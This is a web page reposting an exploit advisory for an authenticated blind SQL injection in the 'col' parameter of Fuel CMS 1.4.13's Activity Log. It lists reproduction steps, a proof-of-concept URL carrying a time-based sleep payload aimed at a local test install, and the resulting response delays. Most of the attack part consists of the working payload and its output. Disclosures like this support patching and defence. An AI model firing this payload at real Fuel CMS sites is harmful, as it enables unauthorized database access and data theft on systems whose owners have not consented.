Exploit/Advisories no image

Published on November 16th, 2021 📆 | 3476 Views ⚑

0

Fuel CMS 1.4.13 SQL Injection – Torchsec

# Exploit Title: Fuel CMS 1.4.13 - 'col' Parameter Blind SQL Injection
(Authenticated)
# Date: 2021-04-11
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link:
https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
# Version: 1.4.13
# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46

Steps to Reproduce:
1. At first login your panel
2. then go to "Activity Log" menu
3. then select any type option
4. their "col" parameter is vulnerable. Let's try to inject Blind SQL
Injection using this query "and (select * from(select(sleep(1)))a)" in
"col=" parameter.

POC:
http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date
and (select * from(select(sleep(1)))a)&fuel_inline=0

Output:
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *